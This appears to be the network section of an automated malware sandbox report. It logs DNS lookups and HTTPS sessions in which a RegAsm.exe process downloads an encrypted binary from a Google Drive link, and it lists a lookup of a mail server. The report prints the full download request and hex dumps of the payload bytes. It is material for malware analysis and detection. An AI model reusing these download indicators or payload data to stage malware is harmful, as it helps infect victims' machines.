Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2021 16:35:50.280833960 CEST | 52216 | 53 | 192.168.11.20 | 1.1.1.1
Oct 12, 2021 16:35:50.301955938 CEST | 53 | 52216 | 1.1.1.1 | 192.168.11.20
Oct 12, 2021 16:35:51.036583900 CEST | 65431 | 53 | 192.168.11.20 | 1.1.1.1
Oct 12, 2021 16:35:51.046997070 CEST | 53 | 65431 | 1.1.1.1 | 192.168.11.20
Oct 12, 2021 16:37:27.012191057 CEST | 52328 | 53 | 192.168.11.20 | 1.1.1.1
Oct 12, 2021 16:37:27.293019056 CEST | 53 | 52328 | 1.1.1.1 | 192.168.11.20
Oct 12, 2021 16:37:28.024907112 CEST | 63068 | 53 | 192.168.11.20 | 1.1.1.1

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 12, 2021 16:35:50.280833960 CEST | 192.168.11.20 | 1.1.1.1 | 0x356e | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
Oct 12, 2021 16:35:51.036583900 CEST | 192.168.11.20 | 1.1.1.1 | 0x14ce | Standard query (0) | doc-00-88-docs.googleusercontent.com | A (IP address) | IN (0x0001)
Oct 12, 2021 16:37:27.012191057 CEST | 192.168.11.20 | 1.1.1.1 | 0x9210 | Standard query (0) | mail.tccinfaes.com | A (IP address) | IN (0x0001)
Oct 12, 2021 16:37:28.024907112 CEST | 192.168.11.20 | 1.1.1.1 | 0x6ada | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 12, 2021 16:35:50.301955938 CEST | 1.1.1.1 | 192.168.11.20 | 0x356e | No error (0) | drive.google.com | | 172.217.168.46 | A (IP address) | IN (0x0001)
Oct 12, 2021 16:35:51.046997070 CEST | 1.1.1.1 | 192.168.11.20 | 0x14ce | No error (0) | doc-00-88-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 16:35:51.046997070 CEST | 1.1.1.1 | 192.168.11.20 | 0x14ce | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.161 | A (IP address) | IN (0x0001)
Oct 12, 2021 16:37:27.293019056 CEST | 1.1.1.1 | 192.168.11.20 | 0x9210 | No error (0) | mail.tccinfaes.com | tccinfaes.com | | CNAME (Canonical name) | IN (0x0001)
Oct 12, 2021 16:37:27.293019056 CEST | 1.1.1.1 | 192.168.11.20 | 0x9210 | No error (0) | tccinfaes.com | | 188.93.227.195 | A (IP address) | IN (0x0001)
Oct 12, 2021 16:37:28.034893036 CEST | 1.1.1.1 | 192.168.11.20 | 0x6ada | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • drive.google.com
                                                                                                                              • doc-00-88-docs.googleusercontent.com

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.11.2049785172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-10-12 14:35:50 UTC0OUTGET /uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Host: drive.google.com
                                                                                                                              Cache-Control: no-cache
2021-10-12 14:35:50 UTC | 0 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Tue, 12 Oct 2021 14:35:50 GMT
                                                                                                                              Location: https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Content-Security-Policy: script-src 'nonce-z+YriJyAGtlG7ri72yDjKg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Server: GSE
                                                                                                                              Set-Cookie: NID=511=vDyPGg6HyaafQXtSzkh9HZU5AZKX4V7olV_nLdD6g4d0yM0Ot_dJNQUuDAHWbTIoqkTs7PqsxTzqifALuvjEJLJkXsFZee-lArZKo8hZ-KCvQcxDB1-0wBUWw2oyGvvxEP7EeyFkIuDbKj3seUZA07gpHqIaMa0_LSClw63POwk; expires=Wed, 13-Apr-2022 14:35:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                              Accept-Ranges: none
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
2021-10-12 14:35:50 UTC | 1 | IN | Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9glj
2021-10-12 14:35:50 UTC | 1 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49786 | 142.250.185.161 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-12 14:35:51 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: doc-00-88-docs.googleusercontent.com
                                                                                                                              Connection: Keep-Alive
2021-10-12 14:35:51 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                                                              X-GUploader-UploadID: ADPycdvWRcSX7LkHLpcnRaBJFwwcalrM1cXYMT2SEMmlylz55sZit0E3mV09IVGKBOjm01bsidlrDP16xp1gqD5jEi4
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, 
X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Disposition: attachment;filename="KEV-LOG_gNNqvwvBuU104.bin";filename*=UTF-8''KEV-LOG_gNNqvwvBuU104.bin
                                                                                                                              Content-Length: 221760
                                                                                                                              Date: Tue, 12 Oct 2021 14:35:51 GMT
                                                                                                                              Expires: Tue, 12 Oct 2021 14:35:51 GMT
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              X-Goog-Hash: crc32c=LlDGKA==
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: Wi+)@y;ssRJI@fyL\G[t=L)VP{*VRF pwvPKFRn5(1y-0NiB"O#A{Dk2l"s*puTK&Wx|]vQ>A)y9;8S)V8UVIMyq6a4D<1$F ;*K+8e8
                                                                                                                              2021-10-12 14:35:51 UTC37INData Raw: 88 98 95 9d 40 bc 65 48 a7 54 81 27 1c 55 61 2d 67 01 f7 79 79 f1 23 d5 89 2d 96 63 62 cd 8c 3b fe b6 a4 c9 5e a4 dc 58 48 5d dd bf 5a 21 76 c2 16 5c 8f a9 80 85 15 d6 c9 f1 b5 2e f2 64 a2 9f fd ea ef 56 7d 10 f3 ed b0 fc fd 82 1b 42 1d 33 bf 84 a6 24 e3 a3 03 92 b6 a2 cb 38 aa 90 f2 1c a3 a9 0c eb 5f 2e 7d c1 4c ec 6e da f6 5c c4 90 d1 9d 90 b2 96 6b 9b 1a 21 13 0a 3d f5 5a b1 cd f0 1d 08 c0 ed 82 cd 95 a7 a7 05 46 01 f0 14 d1 4a b0 3a a3 ca 19 c3 89 97 be 1a 3a 2d 90 eb 6d 3b 3f 7b fd 82 1e 00 be 79 ad 09 1d 12 93 a8 3b 4a 59 ff 1e 3d 8c ba 4b a3 61 0d ba 4e d6 cc d2 24 8e eb 09 6b e8 74 1f df 19 5f d1 c1 53 d2 38 dc 83 6c c8 06 e9 2f f4 d9 b4 80 a6 6b 0f cd f8 a1 9c af f0 2c c8 dd 5a 34 33 aa 6f bf b3 ab d0 1f c1 02 19 34 29 42 59 78 0b d7 c2 55 db 28
                                                                                                                              Data Ascii: @eHT'Ua-gyy#-cb;^XH]Z!v\.dV}B3$8_.}Ln\k!=ZFJ::-m;?{y;JY=KaN$kt_S8l/k,Z43o4)BYxU(
                                                                                                                              2021-10-12 14:35:51 UTC38INData Raw: 0a ac 5d ec 46 57 cc 2f f1 6a 07 ad 05 1d e9 1e 9d ab d4 4f 28 6a f8 9b a3 16 04 ea cc 1d d1 3d 8f d2 3d 29 72 78 d0 eb 8a fe e8 7e de 6c f6 d7 49 a0 1e 4e f1 51 d3 4f d2 f3 32 7d 50 77 a6 b2 14 85 15 98 62 4d 64 f0 23 78 53 85 50 f7 29 ae f4 16 7b fe 19 47 57 7e b0 b3 ee 5e ee 26 77 10 12 e8 51 d8 2d 3b 62 57 82 00 51 fa 16 2b 8b 08 ac 5d 78 e5 c2 18 5e 14 17 4f 02 60 26 f4 da 6d 06 21 b6 59 4c 31 b9 ea 23 83 01 00 77 7f e7 c6 d8 ba 2c cc 51 18 1b 68 30 87 eb 8c 64 7c ae aa 43 f7 01 41 4e 1a cf e3 7a 7c 08 77 51 3e b9 e3 74 bb 28 07 1f 1c cb f5 ab 96 3d 1f db 28 59 02 ac d0 ed fb 4d 47 97 b3 23 7a ef e9 d4 4d 67 ae 2f 8d a0 2a be a6 c6 b7 e9 c5 74 28 c7 61 6f de a7 68 e1 62 8b f3 18 36 e7 f0 0c ea 24 46 7b e1 8d f7 79 c6 72 49 f7 b4 53 e0 0e e4 ef c6 ff
                                                                                                                              Data Ascii: ]FW/jO(j==)rx~lINQO2}PwbMd#xSP){GW~^&wQ-;bWQ+]x^O`&m!YL1#w,Qh0d|CANz|wQ>t(=(YMG#zMg/*t(aohb6$F{yrIS
                                                                                                                              2021-10-12 14:35:51 UTC39INData Raw: 69 d4 53 29 25 d3 cd 97 9d 4c d9 e9 61 93 51 92 24 73 31 49 49 60 29 77 14 89 f7 0b 61 98 28 b4 69 5b cc 8a 5e 08 9e 05 c1 3e 9b 25 38 48 5d cf 1a d3 23 76 c5 2d e8 86 81 ec e9 2f d1 a6 66 b3 06 cd 6e 8a 12 82 8a e5 39 f5 39 c5 e4 98 d5 d5 a6 11 1d 3b 7b 8c ad 2d 2f e5 81 cb 1c b7 a4 bf 4e be b8 7b 35 94 a0 2a e4 5f 81 7c c1 4c ec d8 da f6 5c ea 0e e9 9e 96 a7 e2 20 8c 13 0d b0 83 3f ff 33 17 72 f0 17 6d 23 d6 83 c7 b7 17 8f 3c 43 12 fc 42 f6 4b b0 34 9a 40 0a ca a7 dc 03 1a 3c 48 75 d0 6c 3d 5a e5 d5 0d 16 11 b2 2f 7a 09 1d 10 a8 3d 12 5f 4e d1 b1 34 a4 d3 27 99 66 62 3a 49 fe f0 f9 9c 88 95 6f 78 ed 61 33 6f 94 5e d7 e3 c0 ed 29 d1 c4 d9 c8 06 e9 04 ea 41 b3 ac 92 66 4d cf f8 a3 a7 9f e2 27 df f1 11 1c 31 a0 06 94 b9 ba dd 76 cd 3c 1a 32 3e 37 28 7d 64
                                                                                                                              Data Ascii: iS)%LaQ$s1II`)wa(i[^>%8H]#v-/fn99;{-/N{5*_|L\ ?3rm#<CBK4@<Hul=Z/z=_N4'fb:Ioxa3o^)AfM'1v<2>7(}d
                                                                                                                              2021-10-12 14:35:51 UTC41INData Raw: d0 33 66 f5 25 13 ae 75 aa 40 48 c4 f9 49 44 01 80 16 21 e6 0d 92 83 9d 49 30 92 d1 93 aa 65 b2 85 f6 16 db 2e 9b ff 64 3b 77 69 06 53 a4 fd f6 45 f8 6c e7 d8 77 04 1c 62 f4 6e e4 4a d2 e8 58 58 41 89 ad 99 3e f5 13 a0 dd 9b 22 0d 25 54 7b a6 50 e4 13 85 a8 42 7a f8 31 3f 57 7e ab c3 cc d2 c5 2c 70 7e 66 ef 47 f2 a3 44 63 57 14 15 41 f1 85 39 8c 20 b0 5a 60 cf 0d 1f 56 7b 96 48 1b 4a f9 fd f2 42 9a 27 a6 54 eb 1a f0 e3 97 37 1a 20 c5 6c e3 d7 40 32 87 fa e7 22 0a 6c bf 88 e0 bf fa 57 87 bb d6 e0 17 c4 34 80 d8 fa 75 4b 54 eb 57 2b a0 f9 2e 22 06 29 14 03 9b 45 a4 98 34 08 ff 9c ee 1d a1 c9 c0 6f 5c 8e 8a a4 3d ee f8 ff 55 e5 4b fd 3b 95 98 b4 8b 3a ca 85 6c 04 68 a6 c6 80 6b d5 df f4 fc 12 cf ec 4e a0 3d c5 19 da 8f 46 79 e1 91 f0 1b 2e 53 d7 f7 b4 53 7c
                                                                                                                              Data Ascii: 3f%u@HID!I0e.d;wiSElwbnJXXA>"%T{PBz1?W~,p~fGDcWA9 Z`V{HJB'T7 l@2"lW4uKTW+.")E4o\=UK;:lhkN=Fy.SS|
                                                                                                                              2021-10-12 14:35:51 UTC42INData Raw: b6 0d 53 66 af 42 c0 6d 9b 2e fb ae 85 8c 59 ba 72 70 85 69 16 23 62 34 76 3c 73 3a 5a 68 6a cf 89 69 89 2d 8d 00 49 cb a4 45 f9 9e 0f e3 4f a2 a2 32 5b 48 f1 0a f9 23 7c da 0d fb 9d a5 98 e6 07 4e c8 fb b9 17 c0 4f a2 98 83 80 85 80 51 a6 c4 ee ba d1 cd b4 17 50 1b 74 fd 84 a6 24 f4 8c 8c 90 b7 a4 bf 8e b4 4a de ab 95 aa 06 93 05 0b 7d cb 55 9a 45 ce 99 25 c3 b8 e3 b6 10 b7 e8 0d f4 ba 24 3b 88 2c d6 4e bb 62 d3 0c 17 87 c6 83 cd 95 ce 2e 3d 45 0b 99 7f b1 4a ba 16 1c 47 1b c9 9e aa 6f 69 3b 27 f5 f9 ed 38 35 7b ba ad 1d 00 b2 14 ed 18 3d 07 ae 10 28 4a 5f dd cf 9c 8d b0 2e bc 4d 08 96 59 d2 dd db 5d f4 95 69 6a 99 0c 37 47 1a 4c c8 f8 f8 bd 4b d7 ec 5c e1 84 e0 29 da 3f 16 81 a0 1f 7c d0 e9 b8 a5 81 db 3d ce f5 74 5b 92 a1 00 8f 97 86 df 3f f8 12 31 3e
                                                                                                                              Data Ascii: SfBm.Yrpi#b4v<s:Zhji-IEO2[H#|NOQPt$J}UE%$;,Nb.=EJGoi;'85{=(J_.MY]ij7GLK\)?|=t[?1>
                                                                                                                              2021-10-12 14:35:51 UTC43INData Raw: a7 73 81 d7 7a 3e c6 87 14 2a 2c a7 73 93 e2 56 ca 0d 5b 6e 18 a2 3e 34 e9 0f 9d 9c 9e b2 29 40 c1 b9 8b b2 0f 85 fc 90 ee 37 88 fb 77 2f 6d 6d eb 58 88 ef e4 4f 03 6d da c9 69 95 6e 4f f7 73 df c9 d1 f9 5b 28 f1 76 ac bf 31 c4 05 92 64 74 d7 ed 2d 80 7a 8a 41 f1 0b 2e a9 15 71 74 8c 63 57 7f a9 d9 cb 50 fd 26 70 6e 66 f6 41 2c 43 68 72 51 a0 bb 57 d1 7f b5 31 20 2c 5d 6b ea d1 0e 45 71 0a 5f 08 75 26 03 f3 6e 0f 19 3d 74 4e 1a ef ed 18 3b 01 11 7b 7b 1d d6 f0 37 83 c9 6a 22 1b 66 3c 99 03 9e 40 51 ac dc 55 fe 1a d1 5d 0d d4 ff 82 55 00 61 58 3c 82 f7 65 be 0a 59 be 1d c1 d3 8a 96 38 17 d8 13 ec 19 bf dc fc e2 50 8e 98 45 33 5e df f1 5d ee 7d e6 3e 8a 8e bd 32 a1 cc 9a 7c 0f 6e 2e e8 3c 79 ca ad 40 eb 0d dc f9 0b 39 24 c7 1e f0 24 57 73 f7 f3 f7 28 38 64
                                                                                                                              Data Ascii: sz>*,sV[n>4)@7w/mmXOminOs[(v1dt-zA.qtcWP&pnfA,ChrQW1 ,]kEq_u&n=tN;{{7j"f<@QU]UaX<eY8PE3^]}>2|n.<y@9$$Ws(8d
                                                                                                                              2021-10-12 14:35:51 UTC45INData Raw: eb ba 39 d1 f9 82 96 4d 7c 8d d5 c5 55 32 04 6b ad 94 9b 62 92 63 60 99 7f 2a 20 62 3e 0e 81 62 29 7b 7c 16 5a 0a 6b 83 3e 90 34 59 cd 8c 31 ea 92 2d 65 5f a2 a8 35 41 75 81 97 f8 25 65 c0 21 f8 a7 12 8a ea 25 ff 58 f8 b3 00 ef 43 a2 99 89 a2 65 57 79 32 d6 eb a1 ff a1 cd 1b 42 16 33 44 85 a6 24 f6 86 9c 32 b6 a4 b5 49 a7 ff 34 34 94 a0 24 71 77 0a 77 d2 41 92 53 f3 e8 55 c2 be f8 9a 84 9c 7a 08 9b 1c 33 b6 85 3f f5 5d 8d 67 e4 35 a1 af d7 89 a2 8a a1 8f 36 6d 26 f6 6a bb 59 b6 2f 8d 6e 2a c3 8f b5 2c 78 12 09 fd d1 6a 2a 33 55 5e 0c 1c 0a d7 8b cc 09 17 3e ef 38 39 4c 4c de b1 3b a4 8d 25 99 6a 1c b9 3c ec f6 d1 3f a0 c3 69 6b ee 63 3d 4e 33 62 d6 e9 e7 c3 32 a2 fd 56 c9 1d cb 3a df 50 b0 96 88 5a 6f cd fe b6 bc 85 fb 3e ce ed 56 7a 33 a0 06 5b bd 8e f2
                                                                                                                              Data Ascii: 9M|U2kbc`* b>b){|Zk>4Y1-e_5Au%e!%XCeWy2B3D$2I44$qwwASUz3?]g56m&jY/n*,xj*3U^>89LL;%j<?ikc=N3b2V:PZo>Vz3[
                                                                                                                              2021-10-12 14:35:51 UTC46INData Raw: 33 e5 b8 20 6e ab 7b 80 cc 6b b5 df 91 fb 2c 11 a3 5d 25 46 57 cc 2f 6c 68 07 a1 42 8e e8 1e 9d 90 85 5d 21 03 61 be a3 1c 1d 91 e0 0f c2 0f b1 fb 64 2a 63 6a e9 41 12 ed e4 47 f4 7d fc b2 d1 fb 1d 44 e4 72 e6 44 fa 62 5e 47 57 18 1e b4 3c d4 02 66 65 73 23 f3 32 75 53 3a 53 f7 25 e9 1a 14 7b f2 25 9d 56 68 44 dd b4 66 07 2c 70 7f 7d e2 79 4d 41 44 65 38 3a 12 56 db 5d a5 8c 20 26 50 69 e4 e6 bf 55 7b 0c 21 b0 6b 2b f7 da de 06 21 b6 67 48 0b f5 f0 1d 27 12 15 5a 2f f2 c1 cd 21 01 c9 6d 33 01 7d 2e e1 4f 9e 6c 5d ab 90 5b ed 18 d6 32 ae df e5 76 20 3e 77 51 2f b9 e8 74 b0 8e 81 08 2d d5 f1 35 87 38 1d c3 0e f9 06 84 1e fc f3 5c fe 9c ba 32 78 f5 f1 4f ed 83 72 28 9b 9d ba a9 28 7b a8 c8 68 58 38 c0 99 6a c6 b6 64 eb 0b cb 7e 47 3c 3b db 1e ed 35 51 6f f7
                                                                                                                              Data Ascii: 3 n{k,]%FW/lhB]!ad*cjAG}DrDb^GW<fes#2uS:S%{%VhDf,p}yMADe8:V] &PiU{!k+!gH'Z/!m3}.Ol][2v >wQ/t-58\2xOr(({hX8jd~G<;5Qo
                                                                                                                              2021-10-12 14:35:51 UTC47INData Raw: e9 23 48 63 aa ee bb 25 db d5 9e 91 54 66 b9 4c c5 5b 22 2c fb af 94 9d 7a b6 7f 2c 93 59 9b 21 62 35 7a 1d 60 29 2d 7b 79 f7 55 6b 89 3c ef b6 58 cc 86 3b fe e0 37 ca 5e a6 8a 2f 4a 5d df bf bf 20 76 c2 16 fa 8d a9 8c 85 e9 d7 c9 f1 6d 08 e2 4f 95 99 83 80 e3 7e 41 38 c5 e4 6e fa d3 d8 29 43 17 58 ad 92 a4 2e e3 a3 e3 93 b6 a2 9d 41 a8 90 f0 5b 52 aa 0c e7 a9 04 58 e9 71 83 54 d1 fb 7e fa b8 e9 94 4e b4 ee 21 9a 06 25 3b 82 3f f3 5c 85 51 f0 13 18 af d7 82 cd 9f 91 8f 20 09 01 f8 70 b1 4a b1 25 bb 45 1b 9f 8f bf 00 44 3a 27 ee a2 d6 3b 35 77 df 0b 62 33 b9 07 c9 21 0a 14 bb 3e 11 03 5c d7 a6 15 94 b2 24 9f 0f cb b0 48 f4 28 df 01 a0 a2 69 6b e2 7c 1f 7f 1b 5f dd 37 ed d4 46 e5 ed 56 cd 2e f4 2b dc 56 9e c9 a3 15 69 e5 e1 a7 b4 92 9c ea ce f5 74 ea 3d 85
                                                                                                                              Data Ascii: #Hc%TfL[",z,Y!b5z`)-{yUk<X;7^/J] vmO~A8n)CX.A[RXqT~N!%;?\Q pJ%ED:';5wb3!>\$H(ik|_7FV.+Vit=
                                                                                                                              2021-10-12 14:35:51 UTC48INData Raw: b5 03 37 ab 83 23 dd 3d 3f 6c dc ff 90 d2 60 2f cc 98 f1 1b 05 ab 57 b8 45 57 a3 07 48 79 74 11 2d 3e e3 0d 93 9c 96 64 93 6c d0 b5 8b a6 0d 85 f0 34 f5 37 88 f0 6f 2d 5a 51 f8 52 82 e8 10 57 fa 44 47 de 61 fc 35 6a f7 79 fd 67 e3 f9 5d 4d 47 89 ad d5 10 dd 07 9c 4e 62 f5 43 20 7e 7d 8e 74 f7 23 8c 80 80 7b f8 3b 6f 7f cc b9 dc d2 52 c6 9f 73 7f 6a 9a d5 d3 42 4e 6b 38 3d 12 56 db 1a be 8d 20 26 4b 17 67 cf 1f 5c 14 83 4f 02 60 38 f4 da f6 05 21 ba 07 ca 1b f0 e9 03 5e b4 01 71 66 8c 50 dd 34 91 cd 0f aa 0b 6c 29 e1 74 9e 6c 5d 94 bc 62 53 0a db 5b 6f 5a e4 7c 5e 24 18 e4 35 aa ec 0a 39 01 36 15 0b ae 51 a3 87 32 78 5b 01 e8 08 bf dc ed f9 72 5b 84 bb 38 51 fe e0 5a fa 55 61 3d 8a 76 aa a9 58 cd 8b 74 74 b3 3a c0 95 6e 34 a3 08 d6 0e cd f7 32 4f 20 db 0d
                                                                                                                              Data Ascii: 7#=?l`/WEWHyt->dl47o-ZQRWDGa5jyg]MGNbC ~}t#{;oRsjBNk8=V &Kg\O`8!^qfP4l)tl]bS[oZ|^$596Q2x[r[8QZUa=vXtt:n42O
                                                                                                                              2021-10-12 14:35:51 UTC50INData Raw: a1 de 0f 2d 29 fd 3d be aa ad c4 b0 23 c8 d0 9e 80 57 70 5b 6f e9 56 2f 3f fe ae 85 98 50 48 62 4c 91 7c 83 0a c3 33 75 05 e7 2b 71 7d 6e 7a 0c 6b 89 2c 90 04 4e c9 00 0e f8 9e 04 69 56 af ab 2c 5c 4a 54 b8 f8 23 77 d7 3a f3 8b bf 9d 76 3e d3 e1 58 b3 06 cd 76 a6 8f 13 a6 ca 5f 6f a2 ed ff b0 fa df 76 24 42 17 5d ad 91 a6 2e ef a3 90 91 b6 ae cc 67 aa 90 f7 45 ab aa 0c ec 89 01 7e c1 32 91 54 db ed 7c c2 b8 e9 85 a0 b7 e8 57 9b 1a 25 65 82 3f e4 2f 23 73 f0 17 08 a9 a9 a8 cc 9f a5 a7 2b 47 01 f0 42
                                                                                                                              Data Ascii: -)=#Wp[oV/?PHbL|3u+q}nzk,NiV,\JT#w:v>Xv_ov$B].gE~2T|W%e?/#s+GB
                                                                                                                              2021-10-12 14:35:51 UTC50INData Raw: e0 49 b0 38 a3 5e 19 c3 89 d0 c6 1a 3a 2d 21 df 49 13 02 7d d5 07 10 28 80 07 cd 03 c3 16 bd 46 12 4b 5f d3 88 2a 8e b0 22 b1 31 0e b0 4e d6 ef d3 24 8e fa af 6b e8 7a e9 49 3e 77 e0 e9 ed d8 35 fe d4 56 c9 0c 3d 29 da 7a b7 9c a0 15 6f cd fe a5 a8 b6 f3 22 d4 f5 7e 35 33 a0 30 85 ae e7 da 17 f3 3e 1a 35 34 0c 30 78 ef d1 ea c7 b5 28 89 78 5a c1 dd a3 c3 ba 34 88 0d 86 a2 29 f1 4b 71 ac 0c 91 09 fe be 17 a3 32 40 1c 1f 94 36 98 67 28 57 a4 84 2f a2 3e f8 00 d4 b3 68 f3 a5 bd 8e d5 d0 76 28 75 39 93 c2 61 bf 7f c1 d6 d5 2e f9 9b 7b 70 85 aa f6 fd b9 e6 0b ad 68 e2 b9 90 80 a2 f5 4b fe a7 d3 e6 6b 5a 16 18 f8 9e fd cc c9 be 13 dd 10 3d 58 bc c9 45 72 c5 ba 9e 7d 19 78 ba c1 ee c2 b9 49 33 87 c4 ea 18 e3 54 0f 91 73 bf 3b 22 56 09 e1 d5 29 7e 52 32 40 70 26
                                                                                                                              Data Ascii: I8^:-!I}(FK_*"1N$kzI>w5V=)zo"~530>540x(xZ4)Kq2@6g(W/>hv(u9a.{phKkZ=XEr}xI3Ts;"V)~R2@p&
